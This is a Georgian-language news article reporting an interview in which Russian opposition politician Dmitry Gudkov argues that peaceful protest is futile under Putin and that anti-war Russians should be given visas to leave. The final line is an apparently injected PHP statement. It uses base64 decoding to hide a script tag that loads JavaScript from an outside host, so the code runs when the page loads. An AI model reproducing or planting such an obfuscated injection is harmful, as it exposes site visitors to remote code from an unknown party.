celsiusi
ავერსი შნაიდერი
ძალიან დიდი მითია ის, რომ ფაშისტურ ქვეყანაში, დიქტატურულ სახელმწიფოში დარჩენილი, ჩაკეტილი ადამიანები მშვიდობიანი აქციებით რაღაცაზე მოახდენენ ზეგავლენას , - ამის შესახებ რუსმა ოპოზიციონერმა დიმიტრი გუდკოვმა რადიო "მაესტროსთვის" მიცემულ ექსკლუზიურ ინტერვიუში განაცხადა. 
 
"ეს არარეალურია, გთხოვთ დამიჯერეთ, მესმის, რომ იმ ადამიანებისთვის, რომლებიც ცხოვრობენ დემოკრატიულ ქვეყნებში, ეს არ ესმით და ვერ იგებენ, ამბობენ, ეს როგორ?! აგერ ნახეთ, უკრაინა პუტინის ფაშისტურ რეჟიმს წინააღმდეგობას უწევს ჯარით და სრულიად დასავლეთის მიერ მიწოდებული იარაღით, მიუხედავად ამისა, პუტინის მიერ ოკუპირებული ტერიტორიების დეოკუპაციას რთულად ახერხებს. ამ ფონზე, რიგითი ადამიანებისგან რას ელით, რომლებსაც არანაირი იარაღი არ გააჩნიათ, რომლის წინააღმდეგ 400 ათასი რუსეთის გვარდია და დამატებით 800 ათასამდე სხვადასხვა ძალოვანები არიან მობილიზებულნი, როგორიცაა პოლიცია, ომონი და სხვები. 2 მილიონამდეა ძალოვნების რაოდენობა, შესაბამისად, მშვიდობიანი აქციით ვერაფერს იზამენ, აბსოლუტურად ვერაფერს", - აცხადებს დიმიტრი გუდკოვი. 
 
მისივე აზრით, საჭიროა ამ ადამიანების გადარჩენა და უნდა მიეცეთ მათ რუსეთის დატოვების შესაძლებლობა. 
 
"ის ადამიანები, რომლებსაც ჩვენ, მთელი მსოფლიო მოვუწოდებდით გამოსულიყვნენ აქციებზე, გამოდიოდნენ, აპროტესტებდნენ, მაგრამ ძალები არ არის თანაბარი. დღეს კი მათი გადარჩენა უნდა მოხდეს, ვისთანაც მომავალში შესაძლებელი იქნება მუშაობა. ძირითადად ისეთები გარბიან რუსეთიდან, რომლებიც არა თუ მობილიზაციის, არამედ ომის და რეჟიმის წინააღმდეგი არიან.  დღეს მათ არ აქვთ არანაირი შესაძლებლობა თავი დაიცვან. ბევრი ტექნიკური შესაძლებლობები არსებობს, თუ როგორ მოხდეს ამ ადამიანების განსხვავება, პოლიტიკურად აქტიური - აქციის მხარდამჭერისგან, რომლებიც ომის წინააღმდეგ არიან. აუცილებელია ამ ადამიანების გადარჩენა და აქვე უნდა გვქონდეს მხედველობაში ის რომ, ერთი გაცემული ვიზა ნიშნავს - მინუს ერთ ჯარისკაცს! ეს უნდა გვესმოდეს კარგად", - განაცხადა რადიო "მაესტროსთან" ინტერვიუში დიმიტრი გუდკოვმა. 
 
ვრცლად ინტერვიუს მოსმენა შეგიზლიათ აქ: 
536
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");